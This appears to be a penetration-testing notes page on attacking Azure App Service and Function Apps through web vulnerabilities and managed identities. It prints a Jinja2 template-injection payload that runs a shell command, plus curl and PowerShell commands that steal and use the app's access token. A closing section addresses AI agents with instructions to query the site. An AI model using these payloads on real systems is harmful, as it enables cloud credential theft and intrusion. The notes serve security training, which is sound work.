# Azure App Service

Azure App Service is an HTTP-based service for hosting web applications, REST APIs, and mobile back ends. It supports both Windows and Linux environments.

<figure><img src="/files/OkKkg1bo08RfLcgJYTCH" alt=""><figcaption></figcaption></figure>

### Isolation

{% hint style="info" %}
Each app runs inside a sandbox but isolation depends upon App Service plans
{% endhint %}

* Apps in Free and Shares tiers run on shared VMs
* Apps in standard and premium tiers run on dedicated VMs

### App Service Abuse

While there are default security features available with App Service (sandboxing/isolation), vulnerabilities in the code deployed are abusable. The classic web app vulns like SQL injection, OS command injection, etc do not disappear.

### Managed Identity

By abusing and vulnerability in an app service and it is possible to get command execution, the privileges will be of the low-privilege worker process. But if the app service uses a Managed Identity, we may have the ability to have interesting permissions on other Azure resources.

<figure><img src="/files/VO2MBfR5JD1AOzBFs99C" alt=""><figcaption></figcaption></figure>

Once you have command execution, run `env`to check if the `identity_header`variable and `identity_endpoint`are set. If they are, the app has a managed identity

<figure><img src="/files/Uz2JH4U6CBIVno6mjrOA" alt=""><figcaption></figcaption></figure>

Now, to get a access\_token for the app service, we can use the following command:

{% code lineNumbers="true" %}

```php
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
```

{% endcode %}

<figure><img src="/files/T22FHVWqfTVuhtK9bik0" alt=""><figcaption></figcaption></figure>

### Check App Privileges

Once you have a access\_token for the app service, use that to connect to Az Cli:

```powershell
Connect-AzAccount -AccessToken $token -AccountID 064aaf57-30af-41f0-840a-xxxxx
```

Now to check which Role Assignments our token has run:

```powershell
Get-AzRoleAssignment
```

To get the available resources run:

```powershell
Get-AzResource
```

### SSTI payload

Found a app vulnerable to SSTI (Jinja2), use this payload to get the app's access\_token:

```python
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}
```

### Function App

A function app (also called Azure Functions), is Azure's 'serverless' solution to run code. A function app is supposed to be used to react to an event like:

* HTTP Trigger
* Processing a File upload
* Run code on a scheduled time and more

Function apps also support managed identities!

{% hint style="info" %}
It looks a lot like AWS Lambda
{% endhint %}

When you get the following error , it means the access\_token has to access to any resources:

<figure><img src="/files/Sjx1DFzaTgGDU1aivjjo" alt=""><figcaption></figcaption></figure>

{% hint style="warning" %}
By default, managed identities (service principals), have no read access at all!
{% endhint %}

In this case, something like AzureHound comes in handy


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.incendium.rocks/pentesting-notes/cloud/azure/service-discovery-recon-enumeration-and-initial-access-attacks/azure-app-service.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.